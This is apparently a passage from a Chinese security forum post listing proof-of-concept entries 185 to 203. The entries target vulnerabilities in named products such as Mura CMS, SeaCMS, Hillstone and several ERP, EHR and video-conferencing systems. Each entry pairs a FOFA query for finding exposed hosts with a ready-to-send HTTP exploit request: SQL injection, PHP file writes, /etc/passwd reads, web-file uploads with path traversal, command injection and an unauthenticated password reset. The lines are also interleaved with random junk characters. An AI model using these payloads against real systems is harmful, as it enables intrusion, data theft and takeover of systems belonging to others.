Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* Y( n& u6 w; f! t$ s
X-Requested-With: XMLHttpRequest
5 Q8 I; @) c+ `" T
# F% w B" X8 e& {- X
. v: j$ Q. _0 N) _% b% B& Sinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
' f6 g% d* V' Z0 m
/ d2 w& \2 w0 u1 _9 ~9 H8 j. X: t4 G
" H7 U0 s) y1 ^' x% |+ t185. 瑞友天翼应用虚拟化系统SQL注入
! ^$ a/ _6 ~9 q5 u$ M, lversion < 7.0.5.1
X: D9 Q. q8 ~3 U; G+ H3 S: I% z. NFOFA:app="REALOR-天翼应用虚拟化系统"8 h$ O) k. t! J
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
, W$ {7 ~/ Y- xHost: host/ x- S: e. \* O
' a a' Q$ {0 A) B) E/ E$ T8 v4 x) R8 ^& R$ e: P* \
186. F-logic DataCube3 SQL注入 N/ E& [& u+ T) f
CVE-2024-317507 o0 N" Y4 x# c. H0 ?! p- ^4 u
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统1 \$ n# e8 D$ O( h, x5 Q
FOFA:title=="DataCube3"+ z+ v" J' w& y# g( o5 T0 q
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1) u7 f& j5 P# [4 P4 E
Host: your-ip
. n9 I9 q+ x& ~" H; s' |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.02 q- J r9 j; ]- E$ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8! d! Q- `$ p; [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" D5 }8 l7 U% [+ s
Accept-Encoding: gzip, deflate5 \5 F: z; y5 s* Z c$ C
Connection: close
o) c, x: Y$ ?# Z$ G4 ~8 G5 LContent-Type: application/x-www-form-urlencoded9 O( l. [8 s- q% k K2 j/ L4 f
# s4 e, l2 b7 [: ~/ T; y) greq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14509 c+ c3 T: D# w$ I
# y2 j ~% o5 B& Q
' [! g- |6 j, J9 o3 n7 R
187. Mura CMS processAsyncObject SQL注入
/ l. z9 F, G& xCVE-2024-32640
3 Y% q% _1 B3 p: r/ mFOFA:"Mura CMS"
3 Y0 @4 F0 R% h8 _0 tPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1+ v( ?- F% `' R% N* m. t1 O
Host: your-ip' A- `1 Q3 k4 ^( K: K" z
Content-Type: application/x-www-form-urlencoded0 a, L! \' i( ]
: s% \+ t7 g, {2 `4 P& N2 ^" a7 \/ }. }' K; K+ _; F) x$ _4 Z
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
" n2 g6 b2 t2 \' H& z0 H* \# M
' k5 S- n7 G/ T4 y7 x+ q, V4 V1 U188. 叁体-佳会视频会议 attachment 任意文件读取
% S1 u8 z8 `& c7 o# C; Yversion <= 3.9.7; |1 U' y* R; W) ] x
FOFA:body="/system/get_rtc_user_defined_info?site_id"
1 t( U6 F) K* S6 \GET /attachment?file=/etc/passwd HTTP/1.1
3 K8 a4 J0 v9 J! Y5 t3 CHost: your-ip( m3 E- i4 `1 }( R3 N6 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 e, u$ M3 b0 ~: f5 w/ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: W/ e8 c1 v5 ^1 q' G/ H/ e4 N, K. J
Accept-Encoding: gzip, deflate
6 B! @9 ]- Q9 q+ A+ e7 Y+ t: C; pAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
! [$ F- Q- p! p( Z; C# {& uConnection: close0 D( W0 X2 [4 k# Y2 m( }3 @
' V: W# X" O* o2 k# R. ^
2 }, V1 H5 r+ M$ e189. 蓝网科技临床浏览系统 deleteStudy SQL注入7 l( a+ a* h" }+ M# m1 E
FOFA:app="LANWON-临床浏览系统"
, O7 a" Q$ u) z$ M# K2 R" ~% ~GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
; t0 g4 v5 A) e h+ y9 PHost: your-ip
$ F& f2 J7 ]8 yUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& d5 u9 y! e3 u" aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% b; h6 [2 P5 s# |, @Accept-Encoding: gzip, deflate
- l' E% L/ X5 }+ y2 q* j0 xAccept-Language: zh-CN,zh;q=0.9
' l* k' H- a! T) H7 b3 WConnection: close
0 A* G0 e7 I$ `, v8 r# @' t! y8 b$ O1 h
/ [1 @& |' e( K, e& g8 m2 e# ~+ `
190. 短视频矩阵营销系统 poihuoqu 任意文件读取7 s6 W& b# [8 r. s1 \ Z
FOFA:title=="短视频矩阵营销系统"9 G/ Z4 X1 X, H$ F- {& L' g
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
( S, |4 q! x: i7 fHost: your-ip
) @+ h& X9 U) Y, }# JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.362 @$ B( E$ n2 H) T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ K% d9 J, V) c0 Z" M0 G+ ]
Content-Type: application/x-www-form-urlencoded
, C2 [, p+ x9 `Accept-Encoding: gzip, deflate
7 ?2 U* H5 k5 D) L6 i! fAccept-Language: zh-CN,zh;q=0.9
: Z( } L6 V, M3 F8 H. O8 T7 U0 E" N" _5 W( C8 W" }
poi=file:///etc/passwd/ b( Z6 {' S% M2 E; M3 b: s0 P8 P
5 y4 d* T5 ~6 J4 Q: M
' n8 c5 t+ K) @/ g4 a191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
8 u! W6 I0 g! [) HFOFA:body="/CDGServer3/index.jsp"$ r/ x2 K# {6 h. |% j
POST /CDGServer3/js/../NavigationAjax HTTP/1.16 |1 s# d+ T9 V2 ^+ q; ?
Host: your-ip
1 x3 f) t4 b% a- B' s& _$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 H8 w0 W/ q8 Z% k. K- dContent-Type: application/x-www-form-urlencoded2 X8 Y; C! G* V. a% Q
# R8 q9 c; ~2 D# J6 [
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
5 A- [, \$ m6 I1 `9 v+ b' J2 w# Y8 R" j% K
& Z1 o, B# I) p2 n! M' Q
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 b% k0 |$ o1 E4 S" q
FOFA:title="用户登录_富通天下外贸ERP"
, t, c: B( u3 w6 Y) D1 `" q3 {POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1' g% _, J, f, E$ o
Host: your-ip. ?9 C3 N1 l; F: t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# _5 B6 O* a# X7 j; I0 t
Content-Type: application/x-www-form-urlencoded
: n2 ^" y6 I5 O, I
- u$ L: D- ]! z% }! }# z' K5 K
- i. r2 A! W, R# W<% @ webhandler language="C#" class="AverageHandler" %>* r, B9 s- d4 O& z7 J: {: F; z
using System; ^) `( L( [- C$ Y
using System.Web;! m V. }$ U- h o9 X8 f6 C
public class AverageHandler : IHttpHandler( T' N; a" y' d' O3 M' V
{$ @5 L& {" ^3 _4 e2 k
public bool IsReusable
' S/ J+ I+ V; z. x# M5 g{ get { return true; } }
4 Z. s+ F$ b6 U7 j! ^0 e, tpublic void ProcessRequest(HttpContext ctx)5 S- C) f5 k j% f3 |* C
{2 |) Q9 [$ j1 Q! l
ctx.Response.Write("test");
( v. a+ w# \( n A}' N9 Q7 B, `! f/ f( {1 r3 N
}
! [8 p6 t+ A6 S. F* S! C* h; \( G: X. q8 ]
- ^' [% l( W+ s* y2 X, a& o% p
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行. }' d, r9 ]5 _
FOFA:body="山石云鉴主机安全管理系统"
6 ]3 Q3 x7 D" c; D. N& K# eGET /master/ajaxActions/getTokenAction.php HTTP/1.1
! H4 c4 m0 C& h) P$ WHost:8 O- c$ Z7 O2 r* F* F2 ]0 e7 I3 v
Cookie: PHPSESSID=2333333333333;4 h. a& ?3 c1 n! A2 D
Content-Type: application/x-www-form-urlencoded
! j1 {' {5 P# FUser-Agent: Mozilla/5.0
c( ^4 f4 p- `2 _: `" e* M% H9 L8 ]
$ C( q2 u9 k7 K
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
4 b. d5 M' w- fHost:0 @ o8 k% j; U
User-Agent: Mozilla/5.0/ ?( S, | |$ j* Q+ ]4 q F3 _* N
Accept-Encoding: gzip, deflate1 ] d+ N$ \7 B! L
Accept: */*2 `# C( B7 W. }
Connection: close
* u! H; y& u! `# u( d6 RCookie: PHPSESSID=2333333333333;
7 E+ }6 j9 N7 t" J* g; [5 SContent-Type: application/x-www-form-urlencoded' m1 W( `! \9 q8 f) K
Content-Length: 844 r3 l# m0 n. P0 X
$ I: o2 h* W6 A5 H% j& u$ X3 i( ?param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')3 s" m% \# m: X
$ n% a' c5 B$ G# U; A9 X3 B8 |: V# I9 K1 b
GET /master/img/config HTTP/1.1% r% w9 P/ {$ |6 \
Host:
. U2 S! h( W W9 RUser-Agent: Mozilla/5.0
9 z( O" s$ ?& O- D3 k" E
) c7 T1 n3 ~ q3 s, ]" S& q% V4 j2 Y8 t# W8 ~
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
0 _8 a& P* U) VFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
8 _. |- }; O" L$ |' I' |8 p. \, ]5 I# W- W5 M3 G' F; P
POST /servlet/uploadAttachmentServlet HTTP/1.19 [8 A/ t/ X! W
Host: host# [! Q+ T3 u$ m, F1 k- d* _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.369 q' h$ O0 |& @7 E% {4 ^: q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: x4 K& [9 T+ T# R8 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; m2 S' C. ?+ t' r* {) G3 l
Accept-Encoding: gzip, deflate% A' j9 Q* D, Y1 x- X* @9 S
Connection: close
# z6 L+ O& W% nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk" M+ Z& ]" _4 |, g* x- e+ R
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
! G$ D, c0 R& y% X
9 w; u" }$ e6 O0 m; n8 VContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"2 |0 T% \" K/ C: r9 B4 Y5 |( P
Content-Type: text/plain
9 g+ ]& \& x) F( Q a1 Q<% out.println("hello");%>
; ^) Q* ?4 E: A- s------WebKitFormBoundaryKNt0t4vBe8cX9rZk
. N* U$ ?, c T" C: x+ p. aContent-Disposition: form-data; name="json"
% W4 R5 C, i2 o" j% d$ ^& G {"iq":{"query":{"UpdateType":"mail"}}} X8 j: c( S0 W
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' D! T5 d$ x1 k: I4 u2 P
: D z# F$ `. `/ S' z; e S: t6 J0 o m. S
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
7 _5 c Y# t7 \" k' b: V) ZFOFA:title=="飞鱼星企业级智能上网行为管理系统) z% Q/ u% K5 @, _; m
POST /send_order.cgi?parameter=operation HTTP/1.1( e+ `6 Z* l7 i$ |( X6 m
Host: 127.0.0.1
% {2 I W- d0 v5 d1 d8 ^Pragma: no-cache
# C% u P$ [& PCache-Control: no-cache
' A5 N5 e) c6 f& OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
6 K+ Q+ h- W( dAccept: */*
# W: h5 V Z: `- a+ x' P/ |Accept-Encoding: gzip, deflate
/ y& _0 {1 x9 W; |8 L) ~/ ^+ ZAccept-Language: zh-CN,zh;q=0.9- J( s3 |2 @/ E0 N! a5 w1 Z
Connection: close; b+ d. K3 F7 o6 G7 s! Y5 x; O
Content-Type: application/x-www-form-urlencoded
$ k' ?3 o5 V# r* i# N$ G: B. PContent-Length: 68
5 |' s2 _5 f- o$ g% f. y, ?+ k3 U/ W$ q+ _- `7 R
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
9 U5 V7 ?. I1 ?/ C2 Q6 J" [
/ @( g% {3 j$ w0 @3 E
4 c) n/ ]! ~ F3 F0 }196. 河南省风速科技统一认证平台密码重置# c m7 \' N7 Z8 h* A
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
Q! W% b" r& V+ ~! _POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
# [9 {& W8 Z/ H4 c! H- \# I; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, J0 ~, G) m# q6 Y8 t
Content-Type: application/json;charset=UTF-8
! |# \ M/ Z/ _! B$ yX-Requested-With: XMLHttpRequest: x/ _. J. x/ f, v2 k N
Host:
+ Z4 \3 R) W3 K: fAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.23 |7 ]+ U6 d' G9 o
Content-Length: 45: j8 m( C1 G6 s5 P; C
Connection: close
5 d. X2 J+ s4 M6 o/ F1 R" K4 L2 {5 y+ ?8 Y" A+ O4 C \, w
{"xgh":"test","newPass":"test666","email":""}& z8 d. T7 \1 F# i
# L# |" L& |) N, E
6 ~9 ?' P; _" T! m& J8 N
0 X* |- k& X4 F& s
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" I6 Y/ o: `3 GFOFA:app="浙大恩特客户资源管理系统"8 [5 g/ Y" O( u: M1 G
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1; D' r, e( W* X/ a8 l
Host:+ a$ F4 Z" P5 J) a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
- Y: ]$ D4 F: p* g, NAccept-Encoding: gzip, deflate
* M# w0 C |- a' T, ?$ |6 r7 VConnection: close
6 D* \( d. `+ |, z' v8 B
( g: s4 ^ e4 }& Z1 f i7 |, L$ m. P4 u5 {; w
" k4 ~* t% V4 A198. 阿里云盘 WebDAV 命令注入
9 Z8 p; X$ E( L! vCVE-2024-296406 o1 S- V1 L% [
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1, Q, i: o1 y: g0 b
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64. P1 M" l1 J, |" d
Accept: */* L1 V0 W/ w" Q; m
Accept-Encoding: gzip, deflate
, o( D7 ~, L+ \) b* ?! }Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
6 N4 X1 j% ^0 Z5 GConnection: close
( `( b5 G8 \& X
0 g- l' C7 P: }$ g6 _1 y y* k
199. cockpit系统assetsmanager_upload接口 文件上传. \+ q L: k' x H
, y. a' v6 b0 d, D# n/ P, r* p1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:1 W; f+ l: g5 }* r+ _, ?- n
GET /auth/login?to=/ HTTP/1.1' M# G& w& {, {/ P! \
/ H' W u! |5 @4 `- R9 m响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
: j y* x# X. |) u; V
+ { j8 e" h6 m% z) f$ v; E2.使用刚才上一步获取到的jwt获取cookie:) g* _& V: W7 U# F7 P) `1 ?% F
8 m1 c1 y7 G& g; x* k5 ^/ C* APOST /auth/check HTTP/1.1
; t- D, U. J4 X9 jContent-Type: application/json: a- s' b c4 O0 W
( m3 I% d$ a3 _0 j5 w, q8 I" b
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}) c- p" i- @2 o9 u4 S1 s
2 z, |3 G- n' N7 _
响应:200,返回值:
+ A! P& e L$ _7 i: Q0 E$ d5 i6 aSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/# ] K3 Q* P4 s; C( c; A) [( s3 }
Fofa:title="Authenticate Please!"
0 x3 @! e$ A0 A- z: mPOST /assetsmanager/upload HTTP/1.1
5 g! }# s& g8 U9 @4 G- R9 aContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
' c" r9 Y7 g l7 {7 K( d( G7 d8 ?Cookie: mysession=95524f01e238bf51bb60d77ede3bea92$ z' V4 |" F% g* u4 i
; w& `: E& q( |3 A-----------------------------36D28FBc36bd6feE7Fb3
2 d2 n- N0 p, m6 U U0 ^/ R- ^Content-Disposition: form-data; name="files[]"; filename="tttt.php"
9 G& P" |9 y4 x. ^3 q. Q4 ^& NContent-Type: text/php$ I X8 g) y7 Z* c7 F7 A- r6 m
7 M! @% t9 c2 R4 @" M<?php echo "tttt";unlink(__FILE__);?>( {$ g) h: O. X! \) r
-----------------------------36D28FBc36bd6feE7Fb3! v/ C! M7 G# q& {. t# v% j
Content-Disposition: form-data; name="folder"- g5 [+ d7 o; ~
% T" {& }2 Z" o3 L
-----------------------------36D28FBc36bd6feE7Fb3--9 E2 ~& X2 h8 R5 k' a# t2 Q
5 h6 R$ @) C6 ~& b+ Y
! W' A- G6 I5 G& Q" T% R) T: g2 n/storage/uploads/tttt.php8 Z8 ^ |% X9 }
9 |% _1 d7 l2 Q# y: C200. SeaCMS海洋影视管理系统dmku SQL注入& w' o- F d& H" C/ |% H% t5 z( J
FOFA:app="海洋CMS". K6 G2 l4 d: ^' V
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1 \2 i8 b8 s! T6 p, u6 P% r o1 g
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
- r2 z P4 L( FUpgrade-Insecure-Requests: 14 R$ E8 z0 `' _. j" E2 ^ k f# v
Cache-Control: max-age=05 N$ V% ~: q4 a9 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: u w8 G9 |. D9 s: h9 n. x; n0 U- @0 ]Accept-Encoding: gzip, deflate% z M5 Y' N+ r F
Accept-Language: zh-CN,zh;q=0.90 @. C' x( a/ h" S7 A
) y; G: m. L" [* o
, E7 i5 J: L* s+ G( A+ b201. 方正全媒体新闻采编系统 binary SQL注入
& x! x) ^! `3 i4 j- OFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
; A) Q4 |% H" c1 x8 {( \& T7 Q) xPOST /newsedit/newsplan/task/binary.do HTTP/1.1. N' _1 c' B) k! y3 a) P
Content-Type: application/x-www-form-urlencoded+ n" L* c7 o* N A. c F* r7 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 d9 q0 d, o: g% I4 xAccept-Encoding: gzip, deflate; s) V; Q* V( ~
Accept-Language: zh-CN,zh;q=0.9
! z. l5 z4 I' t% E+ ]3 a/ W$ ]Connection: close
d+ \* f8 F; ?) r; k2 z K! _5 y( C1 h, S' f2 b2 K9 Q# F( F
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1. p$ \5 p6 k& P8 m
1 @+ b- H' P0 Z1 l& m8 s7 i) X7 |3 d7 M/ ~. G; ?
202. 微擎系统 AccountEdit任意文件上传
( Z: A4 z( d. Y r# c+ J6 RFOFA:body="/Widgets/WidgetCollection/"
y$ T) L+ D' [5 J+ Z5 V6 e, i% H$ {获取__VIEWSTATE和__EVENTVALIDATION值; V/ K8 q+ p/ a; q( }
GET /User/AccountEdit.aspx HTTP/1.1' s }6 y; p9 X4 `
Host: 滑板人之家
. D: f5 c: O) O; }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31# O% `( _% A& t9 K
Content-Length: 08 e" A9 k; L9 B; M2 u
4 f6 q J$ l, }+ x5 c- j+ ^3 ]2 J) ~2 `- @" [2 P
替换__VIEWSTATE和__EVENTVALIDATION值+ m; k9 Y8 m" n1 K( K. Q5 ?8 P: h
POST /User/AccountEdit.aspx HTTP/1.1+ m) s# T0 K% x% m
Accept-Encoding: gzip, deflate, br
& L6 _' ~% e# s8 GContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687& M5 n3 M8 I! V& w+ d
4 }0 U9 G4 H! i-----------------------------786435874t38587593865736587346567358735687
' k; h0 x' x1 V0 [9 iContent-Disposition: form-data; name="__VIEWSTATE"; N: W0 s: r' e7 M
9 S4 z9 P- i7 d* z, y. k+ C0 ]% X__VIEWSTATE3 C0 i1 O& y5 e5 Q+ w# b; e( h
-----------------------------786435874t38587593865736587346567358735687
0 n/ I$ r( T+ y0 K+ k% F Z% L, ~Content-Disposition: form-data; name="__EVENTVALIDATION"
2 `) q8 F# J4 V! h9 O" J5 e r: u8 ? W
__EVENTVALIDATION: p# G9 E( Y8 `+ Z# v0 A" D% `
-----------------------------786435874t38587593865736587346567358735687
6 J6 L$ t7 f& q: w$ Y3 tContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"& z# O2 Z% a, m% _+ ]& l
Content-Type: text/plain
. G* j' K; X' J }
: G+ z/ @. o0 k* } }2 \Hello World!. Y% n: P$ K1 E# C; r- X7 D9 H
-----------------------------786435874t385875938657365873465673587356871 J7 o' t# h3 u1 M' W1 I% x4 a
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"* k7 B& S4 |: Z3 }9 M) y$ f
g" V4 w2 V2 E @; `, C: ^
上传图片" G4 G9 H6 c& k3 y( C5 t* O
-----------------------------786435874t38587593865736587346567358735687
1 x9 _# L' x# T0 P% ?* M9 J1 OContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName", c0 U. ] o8 v* ^& b) X, R
! a+ v( Y" q/ v6 p+ K5 G0 n
; `/ B& W! B/ o* k+ {-----------------------------786435874t38587593865736587346567358735687
`" V) f3 k9 r5 I) {Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"( S- |+ P$ R0 m: M) T5 J
. \: G7 g1 r4 Q
8 R; O0 V; K* Z7 h( U-----------------------------786435874t38587593865736587346567358735687--
. S: O5 T8 l) r- a( A. c
- H/ j% m, U7 L9 R' G/ q, U: ^, H' M: ~0 ?
/_data/Uploads/1123.txt
0 p. R( O/ A$ h g" [" J+ l' i: V) x* F2 `$ H: g% I
203. 红海云EHR PtFjk 文件上传' M d7 D9 U: z* W* p
FOFA:body="RedseaPlatform"
$ K# O" f- C6 h9 y' r; g" dPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.12 Z. \# ]) r9 K& E- t$ w
Host: x.x.x.x
( j, G1 \3 u) z# s3 v7 d( o, HAccept-Encoding: gzip/ z5 g( Z! ^6 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
i$ L: n8 n' g9 m mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
# a0 |: L1 Y6 tContent-Length: 2108 u$ R D7 K' T1 Q2 I
+ x9 |; }" N: t) H! C: w
------WebKitFormBoundaryt7WbDl1tXogoZys49 X" n ~6 Z5 R8 F( |
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"0 i. r g- K' d& A8 k
Content-Type:image/jpeg' l: J, G# b$ p0 h% t
( t8 Y) k4 l' v* @* z
<% out.print("hello,eHR");%>, p/ l: `( ~8 B. h+ H$ ?0 t
------WebKitFormBoundaryt7WbDl1tXogoZys4--
( a3 T I# V" D7 [
1 e: e$ X% E* M1 {8 q' u4 {
9 C0 s/ D0 H# y
+ |2 e3 _ ^. x; W3 q! f e) x! e3 N' q7 a9 i. c1 Z
3 ~1 v9 A6 y8 v
1 E T* J" H. V8 Q) O
|
发表于 2024-6-5 14:31:29
收藏
支持
反对